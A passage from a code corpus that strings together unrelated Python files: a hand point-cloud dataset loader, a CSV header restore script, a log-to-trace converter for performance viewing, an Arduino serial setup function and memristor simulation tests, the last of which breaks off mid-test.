PCA_coeff_mat = sio.loadmat(os.path.join(PCA_data_path, 'PCA_coeff.mat'))
self.PCA_coeff = torch.from_numpy(PCA_coeff_mat['PCA_coeff'][:, 0:self.PCA_SZ].astype(np.float32))
PCA_mean_mat = sio.loadmat(os.path.join(PCA_data_path, 'PCA_mean_xyz.mat'))
self.PCA_mean = torch.from_numpy(PCA_mean_mat['PCA_mean_xyz'].astype(np.float32))
tmp = self.PCA_mean.expand(self.total_frame_num, self.JOINT_NUM * 3)
tmp_demean = self.gt_xyz - tmp
self.gt_pca = torch.mm(tmp_demean, self.PCA_coeff)
self.PCA_coeff = self.PCA_coeff.transpose(0, 1).cuda()
self.PCA_mean = self.PCA_mean.cuda()
def __getitem__(self, index):
return self.point_clouds[index, :, :], self.volume_length[index], self.gt_pca[index, :], self.gt_xyz[index, :]
def __len__(self):
return self.point_clouds.size(0)
def __loaddata(self, data_dir):
point_cloud = sio.loadmat(os.path.join(data_dir, 'Point_Cloud_FPS.mat'))
gt_data = sio.loadmat(os.path.join(data_dir, "Volume_GT_XYZ.mat"))
volume_length = sio.loadmat(os.path.join(data_dir, "Volume_length.mat"))
valid = sio.loadmat(os.path.join(data_dir, "valid.mat"))
self.start_index = self.end_index + 1
self.end_index = self.end_index + len(point_cloud['Point_Cloud_FPS'])
self.point_clouds[(self.start_index - 1):self.end_index, :, :] = point_cloud['Point_Cloud_FPS'].astype(
np.float32)
self.gt_xyz[(self.start_index - 1):self.end_index, :, :] = gt_data['Volume_GT_XYZ'].astype(np.float32)
self.volume_length[(self.start_index - 1):self.end_index, :] = volume_length['Volume_length'].astype(np.float32)
self.valid[(self.start_index - 1):self.end_index, :] = valid['valid'].astype(np.float32)
    def __total_frame_num(self):
frame_num = 0
if self.train: # train
for i_subject in range(self.SUBJECT_NUM):
if i_subject != self.test_index:
for i_gesture in range(self.GESTURE_NUM):
cur_data_dir = os.path.join(self.root_path, subject_names[i_subject], gesture_names[i_gesture])
                        frame_num = frame_num + self.__get_frame_num(cur_data_dir)
else: # test
for i_gesture in range(self.GESTURE_NUM):
cur_data_dir = os.path.join(self.root_path, subject_names[self.test_index], gesture_names[i_gesture])
                frame_num = frame_num + self.__get_frame_num(cur_data_dir)
return frame_num
    def __get_frame_num(self, data_dir):
volume_length = sio.loadmat(os.path.join(data_dir, "Volume_length.mat"))
return len(volume_length['Volume_length'])
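# Hedged usage sketch (not part of the original file): HandPointDataset expects
# an options object exposing the attributes read in __init__; an
# argparse.Namespace works. The PCA_SZ and INPUT_FEATURE_NUM values and the
# data path below are illustrative assumptions only.
#
# from argparse import Namespace
# opt = Namespace(size='full', test_index=0, PCA_SZ=42, SAMPLE_NUM=1024,
#                 INPUT_FEATURE_NUM=6, JOINT_NUM=21)
# train_set = HandPointDataset('/path/to/hand_point_data', opt, train=True)
# points, volume_length, gt_pca, gt_xyz = train_set[0]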
``` |
{
"source": "3ideas/config_tracker",
"score": 3
} |
#### File: scripts/migration/csv_header_restore.py
```python
__all__ = ['read_headers', 'parse_header_line', 'restore_header']
# Cell
#! python
import re
def read_headers(header_file):
"""Reads the header file which consists of lines starting with the table name followed by a : and the header.
It returns a dictionary of table names and their associated header lines.
"""
header_lines = {}
with open(header_file, 'r') as f:
for line in f:
table_name, header = parse_header_line(line.rstrip("\n"))
if table_name is not None:
header_lines[table_name] = header
return header_lines
def parse_header_line(line):
m = re.match('^([^:]+):', line)
if m:
table_name = m.group(1)
line = line[m.end():]
return table_name,line
return None,None
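# Hedged example (not part of the original file): a headers file is plain text,
# one table per line, e.g. (table and column names illustrative):
#   CUSTOMER:id,name,created_at
#   ORDERS:id,customer_id,amount
# read_headers() on such a file returns
# {'CUSTOMER': 'id,name,created_at', 'ORDERS': 'id,customer_id,amount'}.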
def restore_header(filename,output_filename,header,encoding ="latin-1"):
with open(filename, 'r',encoding=encoding) as f:
with open(output_filename, 'w',encoding=encoding) as out:
out.write(header+'\n')
for line in f:
line = line.rstrip('\n')
if line == header:
continue
out.write(line+'\n')
# Cell
try: from nbdev.imports import IN_NOTEBOOK
except: IN_NOTEBOOK=False
if __name__ == "__main__" and not IN_NOTEBOOK:
import argparse
import os
import sys
ap = argparse.ArgumentParser()
ap.add_argument("-n", "--header", required=True, help="headers file for restore")
ap.add_argument("-f", "--file", required=True,
help="file to be converted")
ap.add_argument("-o", "--output", required=False,default='',
help="output filename")
args = vars(ap.parse_args())
filename = args["file"]
headerfile = args["header"]
output_filename = args['output']
    # Strip the suffix of the filename to get the table_name
base=os.path.basename(filename)
table_name = os.path.splitext(base)[0]
if output_filename == '':
output_filename = table_name + '.hdr'
headers = read_headers(headerfile)
if table_name in headers:
restore_header(filename,output_filename,headers[table_name])
else:
print(f"Skipping file:{filename} - no associated header found", file=sys.stderr)
``` |
{
"source": "3ideas/cronos",
"score": 2
} |
#### File: cronos/cronos/convert_time_log.py
```python
__all__ = ['trace_log', 'format_value', 'strip_extra_EnmacClientTime_elements', 'unix_time_milliseconds', 'parse_dt',
'parse_dt_to_milliseconds', 'parse_httpd_dt', 'parse_httpd_dt_to_milliseconds', 'match_last2digits',
'parse_timing_log', 'parse_log_line', 'parse_log_line_to_dict', 'parse_httpd_log', 'log_re', 'request_re',
'parse_httpd_log_file', 'parse_timing_log_file']
# Cell
import xml.etree.ElementTree as ET
import os
import random
import tempfile
import sys
import numbers
import decimal
class trace_log():
def __init__(self,fp_output):
self.outfile = fp_output
self.outfile.write('{ "traceEvents": \n')
self.outfile.write('[')
def write_element(self, event_type, name, categories, pid,tid, ts,additional_args=None,dur=None):
''' {"name": "Asub", "cat": "PERF", "ph": "B", "pid": 22630, "tid": 22630, "ts": 829}'''
line = '"name": "%s", "cat": %s, "ph": "%s", "pid": %s, "tid": %s, "ts": %s,' %(name,categories,event_type,pid,tid,ts)
if dur is not None:
line+= format_value('dur',dur) + ','
if additional_args is not None and len(additional_args) > 0:
line += format_value('args',additional_args) + ','
self.outfile.write('{'+line+'},\n')
def write_start_element(self, name, categories, pid,tid, ts,additional_args=None):
self.write_element('B',name,categories,pid,tid,ts,additional_args)
def write_end_element(self, name, categories, pid,tid, ts):
self.write_element('E',name,categories,pid,tid,ts)
def write_duration_event(self, name, categories, pid,tid, ts,dur, additional_args=None):
self.write_element('X',name,categories,pid,tid,ts,additional_args, dur)
def close(self):
self.outfile.write('],\n')
self.outfile.write(''' "displayTimeUnit": "ms",
"systemTraceEvents": "SystemTraceData",
"otherData": { "version": "PowerOn Client Trace"},
}
''')
self.outfile.close()
def format_value(name, value):
''' takes name and value and returns a string for the value element'''
formatted_string = ''
if name is not None:
formatted_string += '"%s": '%name
if isinstance(value, numbers.Number):
formatted_string += '%s'%value
elif isinstance(value, dict):
formatted_string += '{'
sep = ''
for key1,value1 in value.items():
formatted_string += sep + format_value(key1,value1)
sep = ','
formatted_string += '}'
elif isinstance(value, list):
formatted_string += '['
sep = ''
for item in value:
formatted_string += sep + format_value(None,item)
sep = ','
formatted_string += ']'
else:
formatted_string += '"%s"' %value
return formatted_string
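# Cell
def _demo_trace_log():
    """Hedged usage sketch (not part of the original module): shows how
    trace_log and format_value fit together using an in-memory sink.
    The event names, pids, tids and timestamps are illustrative only."""
    import io
    class _Sink(io.StringIO):
        def close(self):  # keep the buffer readable after trace_log.close()
            pass
    sink = _Sink()
    t = trace_log(sink)
    t.write_start_element('login', '"HttpWebRequest"', 1, 7, 0.0,
                          additional_args={'client': 'hydrogen-w11'})
    t.write_end_element('login', '"HttpWebRequest"', 1, 7, 1250.0)
    t.write_duration_event('/enmac/login', '"httpd"', 1, 42, 0.0, 12.6)
    t.close()  # writes the JSON trailer
    return sink.getvalue()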
# Cell
def strip_extra_EnmacClientTime_elements(filename,fp):
''' since we may have multiple EnmacClientTiming tags in the document we need to strip them out and add one at the end'''
fp.write("<EnmacClientTiming>\n")
if sys.version_info[0] < 3:
file = open(filename, 'r')
else:
file = open(filename, 'r', encoding='utf8')
if file is None:
print('Error opening file: %s' %filename)
return
for line in file:
l = line.rstrip()
if l == '<EnmacClientTiming>' or l == '</EnmacClientTiming>':
continue
fp.write(line)
fp.write("</EnmacClientTiming>\n")
# Cell
import datetime
import re
if sys.version_info[0] < 3:
epoch = datetime.datetime(1970, 1, 1)
else:
epoch = datetime.datetime(1970, 1, 1, tzinfo=datetime.timezone.utc)
match_last2digits = re.compile(r"(\d\d)$", re.IGNORECASE)
#epoch = datetime.datetime.fromtimestamp(0,datetime.timezone.utc) #
def unix_time_milliseconds(dt):
return (dt - epoch).total_seconds() * 1000.0
def parse_dt(time_str):
    ''' Parse string in format 2021-12-07T08:51:46.479299+00:00
    return datetime'''
    if sys.version_info[0] < 3:
        time_str = time_str[:-6]
        return datetime.datetime.strptime(time_str, '%Y-%m-%dT%H:%M:%S.%f')
    else:
        return datetime.datetime.strptime(time_str, '%Y-%m-%dT%H:%M:%S.%f%z').replace(tzinfo=datetime.timezone.utc)
def parse_dt_to_milliseconds(time_str):
return unix_time_milliseconds(parse_dt(time_str))
def parse_httpd_dt(time_str):
''' parse a date time string which is in the format
25/Sep/2002:14:04:19 +0200
'''
if sys.version_info[0] < 3:
time_str = time_str[:-6]
return datetime.datetime.strptime(time_str, '%d/%b/%Y:%H:%M:%S')
else:
        time_str = match_last2digits.sub(":\\1", time_str)
return datetime.datetime.strptime(time_str, '%d/%b/%Y:%H:%M:%S %z').replace(tzinfo=datetime.timezone.utc)
def parse_httpd_dt_to_milliseconds(time_str):
''' parse a datetime in the format:
03/Dec/2021:09:36:46 +0200'''
return unix_time_milliseconds(parse_httpd_dt(time_str))
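# Hedged examples (not part of the original module): both helpers return
# milliseconds since the Unix epoch, and both label the parsed stamp as UTC.
#   parse_dt_to_milliseconds('2021-12-07T08:51:46.479299+00:00')
#   parse_httpd_dt_to_milliseconds('03/Dec/2021:09:36:46 +0200')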
# Cell
class parse_timing_log():
def __init__(self, fp_input, fp_output):
self.parse_functions = {
'Timing' : self.skip_element,
'Parameters' : self.skip_element,
'DataTables' : self.skip_element,
'HttpWebRequest' : self.parse_HttpWebRequest,
'CreateDataSet' : self.parse_CreateDataSet,
'FormAction' : self.parse_FormAction,
}
self.fp = fp_input
self.fp_output = fp_output
#self.elements = []
#self.path_list = []
self.level = 0
self.t = trace_log(fp_output)
self.parse2()
def skip_element(self, elment):
return 0
def parse_datatables_element(self, elem):
''' Parse element datatables which looks like:
<DataTables name="AvailableResources" tables="5" error="false">
<DataTable name="AVAILABLERESOURCES" rows="7"/>
<DataTable name="CONTACTDETAILS" rows="7"/>
<DataTable name="RESOURCEZONES" rows="0"/>
<DataTable name="ASSIGNED_INCIDENTS" rows="0"/>
<DataTable name="RESOURCE_OZ_ASSOCIATIONS" rows="2"/>
</DataTables>
return a list of date tables as arguments...'''
datatables = { 'name': elem.attrib['name'], 'number_of_tables': elem.attrib['tables'], 'error': elem.attrib['error'] }
tables = []
for child in elem:
tables.append({ 'name':child.attrib['name'], 'rows':child.attrib['rows'] })
datatables['tables'] = tables
return datatables
def parse_parameter_element(self, element):
''' Parse element parameter which looks like:
<Parameters postSize="105">
<Parameter name="searchlon" value="28.020557"/>
<Parameter name="positionupdatewithinmins" value="30"/>
<Parameter name="radiusinmiles" value="False"/>
<Parameter name="searchradius" value="10"/>
<Parameter name="searchlat" value="-26.033414"/>
</Parameters>
returns a list of parameters as arguments...'''
parameters = {'postSize': element.attrib['postSize']}
params = {}
for child in element:
params[child.attrib['name']] = child.attrib['value']
#params.append({'name': child.attrib['name'], 'value': child.attrib['value']})
parameters['params'] = params
return parameters
def get_end_time(self, element):
''' gets the timing element in element and returns the ms'''
timing = element.find('Timing')
if timing is None:
print('no timing element found')
return None
ts = timing.attrib["end"]
ms = parse_dt_to_milliseconds(ts)
if timing.attrib["thread"] != element.attrib["thread"]:
            print('mismatched timing threads ??')
return ms
def parse_HttpWebRequest(self,elem):
''' Parse element HttpWebRequest which looks like:
<HttpWebRequest start="2021-12-07T17:46:43.910299+00:00" client="hydrogen-w11" thread="282" method="POST" uri="https://trn1nms/enmac/resources/available" status="OK" serverElapsed="0.33" serverCPU="0.0257">
<Parameters postSize="105">
<Parameter name="searchlon" value="28.020557"/>
<Parameter name="positionupdatewithinmins" value="30"/>
<Parameter name="radiusinmiles" value="False"/>
<Parameter name="searchradius" value="10"/>
<Parameter name="searchlat" value="-26.033414"/>
</Parameters>
<Timing thread="282" end="2021-12-07T17:46:45.688867+00:00" elapsed="1.78"/>
</HttpWebRequest>
'''
name = elem.attrib["uri"]
categories = '"HttpWebRequest"'
pid = 1
tid = elem.attrib["thread"]
ts = elem.attrib["start"]
ms = parse_dt_to_milliseconds(ts)
parameters = elem.find('Parameters')
p = self.parse_parameter_element(parameters)
additional_args = {
'parameters': p,
'start':ts,
'client':elem.attrib["client"],
'method':elem.attrib["method"],
'status':elem.attrib["status"],
'serverElapsed': float(elem.attrib["serverElapsed"]),
'serverCPU': float(elem.attrib["serverCPU"]) }
self.t.write_start_element(name,categories ,pid,tid,ms,additional_args)
self.parse_elements(elem)
ms = self.get_end_time(elem)
self.t.write_end_element(name,categories ,pid,tid,ms)
return 0
def parse_CreateDataSet(self,elem):
'''
Parse element CreateDataSet which looks like:
<CreateDataSet start="2021-12-07T17:50:36.520401+00:00" client="hydrogen-w11" thread="273" path="/enmac/swex/outages">
....
<DataTables name="AvailableResources" tables="5" error="false">
<DataTable name="AVAILABLERESOURCES" rows="7"/>
<DataTable name="CONTACTDETAILS" rows="7"/>
<DataTable name="RESOURCEZONES" rows="0"/>
<DataTable name="ASSIGNED_INCIDENTS" rows="0"/>
<DataTable name="RESOURCE_OZ_ASSOCIATIONS" rows="2"/>
</DataTables>
<Timing thread="282" end="2021-12-07T17:46:45.688867+00:00" elapsed="1.78"/>
</CreateDataSet>
'''
name = elem.attrib["path"]
categories = '"CreateDataSet"'
pid = 1
tid = elem.attrib["thread"]
ts = elem.attrib["start"]
ms = parse_dt_to_milliseconds(ts)
datatables = elem.find('DataTables')
dt = self.parse_datatables_element(datatables)
additional_args = {
'datatables': dt,
'start':ts,
'client':elem.attrib["client"]}
self.t.write_start_element(name,categories ,pid,tid,ms,additional_args)
self.parse_elements(elem)
ms = self.get_end_time(elem)
self.t.write_end_element(name,categories ,pid,tid,ms)
return 0
def parse_FormAction(self,elem):
'''
<FormAction start="2021-12-07T17:46:23.903476+00:00" client="hydrogen-w11" thread="18"
form="MainForm" action="SendNetServerMessage('MD_SET_PIPE_MESSAGE_FILTER', '135')">>
'''
name = elem.attrib["action"]
form = elem.attrib["form"]
categories = '"FormAction,%s"'%form
pid = 1
tid = elem.attrib["thread"]
ts = elem.attrib["start"]
ms = parse_dt_to_milliseconds(ts)
additional_args = {
'start':ts,
'client':elem.attrib["client"],
'form': form}
self.t.write_start_element(name,categories ,pid,tid,ms,additional_args)
self.parse_elements(elem)
ms = self.get_end_time(elem)
self.t.write_end_element(name,categories ,pid,tid,ms)
return 0
    def parse_elements(self, elem):
        for child in elem:
            # The fallback lambda must accept the child argument, and the
            # message should report the actual unknown tag.
            func = self.parse_functions.get(child.tag, lambda _: -1)
            if func(child) < 0:
                print('Unknown tag: %s' % child.tag)
def parse2(self):
tree = ET.parse(self.fp)
root = tree.getroot()
self.parse_elements(root)
self.t.close()
# Cell
# [03/Dec/2021:09:36:46 +0200] 172.17.106.244 "devwks2" "POST /enmac/login/hostDetails HTTP/1.1" 200 652 pid:1980400 time:12680 +
# [03/Dec/2021:09:36:47 +0200] 172.17.106.244 "-" "GET /enmac/packages/restrict_new_clients HTTP/1.1" 404 196 pid:1980400 time:317 +
# [03/Dec/2021:10:04:56 +0200] 172.17.106.244 "devwks2" "POST /enmac/login/hostDetails HTTP/1.1" 200 655 pid:2020510 time:9657 +
# [03/Dec/2021:10:04:56 +0200] 172.17.106.244 "-" "GET /enmac/packages/restrict_new_clients HTTP/1.1" 404 196 pid:2020510 time:243 +
# [03/Dec/2021:15:19:04 +0200] 172.17.106.244 "devwks2" "POST /enmac/login/hostDetails HTTP/1.1" 200 655 pid:2047496 time:11086 +
# [03/Dec/2021:15:19:04 +0200] 172.17.106.244 "-" "GET /enmac/packages/restrict_new_clients HTTP/1.1" 404 196 pid:2047496 time:278 +
# [03/Dec/2021:16:00:04 +0200] 172.17.106.244 "devwks2" "POST /enmac/login/hostDetails HTTP/1.1" 200 655 pid:2020512 time:9956 +
# [03/Dec/2021:16:00:04 +0200] 172.17.106.244 "-" "GET /enmac/packages/restrict_new_clients HTTP/1.1" 404 196 pid:2020512 time:238 +
# [03/Dec/2021:17:57:48 +0200] 172.31.243.25 "hydrogen-w11" "POST /enmac/login/hostDetails HTTP/1.1" 200 655 pid:2020514 time:209610 +
#log_re = re.compile('\[(.*?)\] ([(\d\.)]+) "(.*?)" "(.*?)" (\d+) (\d+) pid:(\d+) time:(\d+) ([+-]+)')
log_re = re.compile(r'\[(.*?)\] ([(\d\.)]+) "(.*?)" "(.*?)" (\d+) (\d+) pid:(\d+) time:(\d+) ([+-]+)')
def parse_log_line(line):
    ''' parse an apache httpd log line and return the matched groups:
    (date, ip, client, request, response_code, length, pid, time, flag)'''
    matches = log_re.match(line).groups()
    return matches
request_re = re.compile('^(.*?) (.*?) (.*?$)')
def parse_log_line_to_dict(line):
#print(line)
#continue
l = {}
matches = parse_log_line(line)
#matches = log_re.match(line).groups()
dt_str = matches[0]
l['dt_str'] = dt_str
l['ts'] = parse_httpd_dt_to_milliseconds(dt_str)
l['ip_addr'] = matches[1]
l['client_name'] = matches[2]
request = matches[3]
l['response_code'] = matches[4]
l['response_length'] = int(matches[5])
l['pid'] = matches[6]
duration_microseconds = int(matches[7])
l['duration_milliseconds'] = duration_microseconds / 1000.0
req_match = request_re.match(request).groups()
l['method'] = req_match[0]
l['name'] = req_match[1]
l['protocol'] = req_match[2]
#print(f'{dt_str} {ip_addr} {request} {response_code} {response_length} {pid} {duration}' )
return l
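def _demo_parse_log_line():
    """Hedged example (not part of the original module): parses the first
    sample access-log line quoted in the comments above."""
    line = ('[03/Dec/2021:09:36:46 +0200] 172.17.106.244 "devwks2" '
            '"POST /enmac/login/hostDetails HTTP/1.1" 200 652 '
            'pid:1980400 time:12680 +')
    rec = parse_log_line_to_dict(line)
    # rec['method'] == 'POST', rec['name'] == '/enmac/login/hostDetails',
    # rec['duration_milliseconds'] == 12.68 (the time field is microseconds)
    return rec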
class parse_httpd_log():
def __init__(self, fp_input,fp_output):
self.fp_input = fp_input
self.fp_output = fp_output
self.t = trace_log(fp_output)
self.process_log()
def process_log(self):
for line in self.fp_input:
l = parse_log_line_to_dict(line)
categories='"httpd"'
additional_args = {
'start':l['dt_str'],
'client':l['ip_addr'],
'client_name':l['client_name'],
'resp_code': l['response_code'],
'resp_len': l['response_length']}
self.t.write_duration_event(l['name'], categories, 1,l['pid'], l['ts'],l['duration_milliseconds'], additional_args)
self.t.close()
# Cell
def parse_httpd_log_file(input_filename,output_filename,stdout):
    ''' parse the httpd access log `input_filename`.
    If `stdout` is set, output is sent to stdout;
    else if `output_filename` is not set, output is saved to `input_filename` with the extension changed to .json;
    otherwise output is saved to `output_filename`.'''
fp = open(input_filename)
if stdout:
fo = sys.stdout
elif output_filename == '':
outfilename = os.path.splitext(input_filename)[0] + '.json'
fo = open(outfilename,'w')
else:
outfilename = output_filename
fo = open(outfilename,'w')
parse_httpd_log(fp,fo)
def parse_timing_log_file(input_filename, output_filename, preprocess, stdout):
    ''' parse the `input_filename`. If the `preprocess` flag is set, the file is first preprocessed
    to strip out extra EnmacClientTiming tags (which is a lot slower since it creates a tmp file).
    If `stdout` is set, output is streamed there;
    if `output_filename` is empty, output goes to the same name as the input with the extension changed to .json'''
tmp_file = ''
if preprocess :
tmp_file = '/tmp/cronos_' + str(random.randint(1, 1000000)) + '.tmp'
fp = open(tmp_file, 'w+')
strip_extra_EnmacClientTime_elements(input_filename,fp)
fp.close()
fp = open(tmp_file, 'r')
else:
fp = open(input_filename)
if stdout:
fo = sys.stdout
elif output_filename == '':
outfilename = os.path.splitext(input_filename)[0] + '.json'
fo = open(outfilename,'w')
else:
outfilename = output_filename
fo = open(outfilename,'w')
parse_timing_log(fp,fo)
fo.close()
fp.close()
if tmp_file != '':
os.remove(tmp_file)
# Cell
try: from nbdev.imports import IN_NOTEBOOK
except: IN_NOTEBOOK=False
if __name__ == "__main__" and not IN_NOTEBOOK:
    import argparse
    ap = argparse.ArgumentParser(description='''Parse ADMS Client Timing Log into event time format. The output file can be viewed in https://ui.perfetto.dev/.
Source and doc for this utility can be found at https://github.com/3ideas/cronos
Copyright 3ideas Solutions Ltd ''')
ap.add_argument('-p', '--nopreprocess', required=False,
help="don't preprocess the file to strip out extra EnmacClientTiming tags in the file", default=True, action='store_false')
ap.add_argument("-f", "--file", required=False, help="client timing log file to parse to generate timing log file from ", default='')
ap.add_argument("-a", "--httpd_logfile", required=False, help="httpd_logfile to parse to generate timing log file from ", default='')
ap.add_argument("-o", "--output", required=False, help="output file name",default = '')
ap.add_argument("-s","--stdout", required=False, help="print to stdout",default = False, action='store_true')
args = vars(ap.parse_args())
if args['file'] != '':
parse_timing_log_file(args['file'],args['output'],args['nopreprocess'],args['stdout'] )
if args['httpd_logfile'] != '':
parse_httpd_log_file(args['httpd_logfile'],args['output'],args['stdout'])
``` |
{
"source": "3isenHeiM/Photob00th",
"score": 3
} |
#### File: raspi/photobooth/photobooth_serial.py
```python
import os
import sys
import time
import signal
import traceback
import logging
from logging import handlers
import serial
import threading
def initSerial(arduino):
try:
# Configure serial communication RaspberryPi-Arduino
arduino = serial.Serial(
#port='/dev/ttyUSB1',
port='/dev/ttyACM0',
baudrate=115200,
parity=serial.PARITY_ODD,
stopbits=serial.STOPBITS_TWO,
bytesize=serial.SEVENBITS
)
        # The constructor opens the port when a port name is given, so only
        # call open() explicitly if the port is still closed.
        if not arduino.isOpen():
            arduino.open()
        if arduino.isOpen() : # Returns true if serial port is opened
            logging.info("Serial communication opened to: %s" %arduino.portstr)
        else :
            raise IOError
except IOError: # if port is already opened, close it and open it again and print message
logging.critical("IOError recieved, trying to open the port in 2s")
arduino.close()
time.sleep(2)
arduino.open()
logging.warning("Port was already open, was closed and opened again.")
return arduino
``` |
{
"source": "3it-nano/QDMS",
"score": 2
} |
#### File: deprecated/tests/test_Log.py
```python
import shutil
import qdms
import numpy as np
def setup_save_load():
memristor = qdms.Data_Driven()
circuit = qdms.Circuit(memristor_model=memristor, number_of_memristor=4, is_new_architecture=True, v_in=1e-3,
gain_resistance=0, R_L=1)
pulsed_programming = qdms.PulsedProgramming(circuit, 4, tolerance=1, is_relative_tolerance=True)
pulsed_programming.simulate()
memristor_sim = qdms.MemristorSimulation(pulsed_programming, verbose=False)
memristor_sim.simulate()
# memristor_result = qdms.HelperFunction.limit_vector(memristor_sim.voltages, 0.175, 0.210)
memristor_result = qdms.HelperFunction.simplify_vector_resolution(memristor_sim.voltages, 0.0001)
quantum_sim = qdms.QDSimulation(memristor_result, verbose=False)
quantum_sim.simulate()
return memristor, circuit, pulsed_programming, memristor_sim, quantum_sim
def compare_everything(setup, load):
if compare_memristor(setup[0], load[0]):
if compare_circuit(setup[1], load[1]):
if compare_pulsed_programming(setup[2], load[2]):
if compare_memristor_sim(setup[3], load[3]):
if compare_quantum_sim(setup[4], load[4]):
return True
return False
def compare_memristor(setup, load):
if type(setup) != type(load): return False
if setup.time_series_resolution != load.time_series_resolution: return False
if setup.r_off != load.r_off: return False
if setup.r_on != load.r_on: return False
if setup.A_p != load.A_p: return False
if setup.A_n != load.A_n: return False
if setup.t_p != load.t_p: return False
if setup.t_n != load.t_n: return False
if setup.k_p != load.k_p: return False
if setup.k_n != load.k_n: return False
if setup.r_p != load.r_p: return False
if setup.r_n != load.r_n: return False
if setup.eta != load.eta: return False
if setup.a_p != load.a_p: return False
if setup.a_n != load.a_n: return False
if setup.b_p != load.b_p: return False
if setup.b_n != load.b_n: return False
if setup.g != load.g: return False
return True
def compare_circuit(setup, load):
if setup.number_of_memristor != load.number_of_memristor: return False
if setup.gain_resistance != load.gain_resistance: return False
if setup.v_in != load.v_in: return False
if setup.R_L != load.R_L: return False
if setup.is_new_architecture != load.is_new_architecture: return False
return True
def compare_pulsed_programming(setup, load):
if setup.nb_states != load.nb_states: return False
if setup.distribution_type != load.distribution_type: return False
if setup.pulse_algorithm != load.pulse_algorithm: return False
if setup.lrs != load.lrs: return False
if setup.hrs != load.hrs: return False
if setup.res_states != load.res_states: return False
if setup.res_states_practical != load.res_states_practical: return False
if setup.max_voltage != load.max_voltage: return False
if setup.tolerance != load.tolerance: return False
if setup.index_variability != load.index_variability: return False
if setup.variance_read != load.variance_read: return False
if setup.variance_write != load.variance_write: return False
if np.all(setup.variability_read != load.variability_read): return False
if np.all(setup.variability_write != load.variability_write): return False
if setup.number_of_reading != load.number_of_reading: return False
if setup.graph_resistance != load.graph_resistance: return False
if setup.graph_voltages != load.graph_voltages: return False
if setup.max_pulse != load.max_pulse: return False
if setup.is_relative_tolerance != load.is_relative_tolerance: return False
return True
def compare_memristor_sim(setup, load):
if setup.is_using_conductance != load.is_using_conductance: return False
if setup.voltages != load.voltages: return False
if setup.resistances != load.resistances: return False
if setup.verbose != load.verbose: return False
if setup.list_resistance != load.list_resistance: return False
if setup.timers != load.timers: return False
if setup.resolution != load.resolution: return False
if setup.std != load.std: return False
return True
def compare_quantum_sim(setup, load):
if np.all(setup.stability_diagram != load.stability_diagram): return False
if np.all(setup.voltages != load.voltages): return False
if setup.Cg1 != load.Cg1: return False
if setup.Cg2 != load.Cg2: return False
if setup.CL != load.CL: return False
if setup.CR != load.CR: return False
if setup.parameter_model != load.parameter_model: return False
if setup.T != load.T: return False
if setup.Cm != load.Cm: return False
if setup.kB != load.kB: return False
if setup.N_min != load.N_min: return False
if setup.N_max != load.N_max: return False
if setup.n_dots != load.n_dots: return False
if setup.verbose != load.verbose: return False
return True
def test_save_load_everything_hdf5():
memristor, circuit, pulsed_programming, memristor_sim, quantum_sim = setup_save_load()
qdms.Log.save_everything_hdf5(path='.//Simulation', directory_name='test_save_load_everything_hdf5', memristor=memristor,
pulsed_programming=pulsed_programming, circuit=circuit, memristor_sim=memristor_sim,
qd_simulation=quantum_sim, verbose=False)
memristor_load, circuit_load, pulsed_programming_load, memristor_sim_load, quantum_sim_load = qdms.Log.load_everything_hdf5(
path='.//Simulation//test_save_load_everything_hdf5')
result = compare_everything([memristor, circuit, pulsed_programming, memristor_sim, quantum_sim], [memristor_load, circuit_load, pulsed_programming_load, memristor_sim_load, quantum_sim_load])
shutil.rmtree('.//Simulation//test_save_load_everything_hdf5')
assert result
```
#### File: deprecated/tests/test_MemristorSimulation.py
```python
import qdms
def test_simulate():
memristor = qdms.Data_Driven()
circuit = qdms.Circuit(memristor, 4)
pulsed_programming = qdms.PulsedProgramming(circuit, 6, tolerance=1)
pulsed_programming.simulate()
memristor_sim = qdms.MemristorSimulation(pulsed_programming)
memristor_sim.simulate()
memristor_sim_load = qdms.Log.load_memristor_simulation_hdf5('./tests/TestData/memristor_sim_data.hdf5', pulsed_programming)
assert memristor_sim_load.voltages == memristor_sim.voltages
```
#### File: deprecated/tests/test_PulsedProgramming.py
```python
import qdms
import numpy as np
def test_read_resistance_without_variability():
memristor = qdms.Data_Driven()
circuit = qdms.Circuit(memristor, 1)
pulsed_programming = qdms.PulsedProgramming(circuit, 2)
value = pulsed_programming.read_resistance(pulsed_programming.circuit.memristor_model)
assert round(value) == round(pulsed_programming.circuit.memristor_model.r_on)
def test_read_resistance_with_variability():
memristor = qdms.Data_Driven()
circuit = qdms.Circuit(memristor, 1)
pulsed_programming = qdms.PulsedProgramming(circuit, 2, variance_read=1/300)
result = []
for _ in range(1000):
value = pulsed_programming.read_resistance(pulsed_programming.circuit.memristor_model)
max = pulsed_programming.circuit.memristor_model.r_on + 0.015 * pulsed_programming.circuit.memristor_model.r_on
min = pulsed_programming.circuit.memristor_model.r_on - 0.015 * pulsed_programming.circuit.memristor_model.r_on
if min < value < max:
result.append(True)
else:
result.append(False)
assert np.all(result)
def test_write_resistance_without_variability():
memristor = qdms.Data_Driven()
circuit = qdms.Circuit(memristor, 1)
pulsed_programming = qdms.PulsedProgramming(circuit, 2)
pulsed_programming.write_resistance(pulsed_programming.circuit.memristor_model, -2, 200e-9)
value = pulsed_programming.read_resistance(pulsed_programming.circuit.memristor_model)
assert value > pulsed_programming.circuit.memristor_model.r_on
def test_write_resistance_with_variability():
memristor = qdms.Data_Driven()
circuit = qdms.Circuit(memristor, 1)
pulsed_programming = qdms.PulsedProgramming(circuit, 2, variance_write=1/300)
result_max = []
result_min = []
pulsed_programming.circuit.memristor_model.g = 1/2000
for _ in range(1000):
previous = pulsed_programming.read_resistance(pulsed_programming.circuit.memristor_model)
pulsed_programming.write_resistance(pulsed_programming.circuit.memristor_model, 0, 200e-9)
next = pulsed_programming.read_resistance(pulsed_programming.circuit.memristor_model)
result_max.append((next - previous) / 2000 * 100 <= 1.2)
result_min.append((next - previous) / 2000 * 100 >= 0.9)
assert np.all(result_max) and np.any(result_min)
def test_distribution():
memristor = qdms.Data_Driven()
circuit = qdms.Circuit(memristor, 9)
pulsed_programming_linear = qdms.PulsedProgramming(circuit, 2, distribution_type='linear')
pulsed_programming_half_spread = qdms.PulsedProgramming(circuit, 2, distribution_type='half_spread')
pulsed_programming_full_spread = qdms.PulsedProgramming(circuit, 2, distribution_type='full_spread')
result = False
if len(pulsed_programming_linear.res_states) == 1:
if len(pulsed_programming_half_spread.res_states) == 3:
if len(pulsed_programming_full_spread.res_states) == 9:
result = True
assert result
def test_log_convergence():
memristor = qdms.Data_Driven()
circuit = qdms.Circuit(memristor, 1)
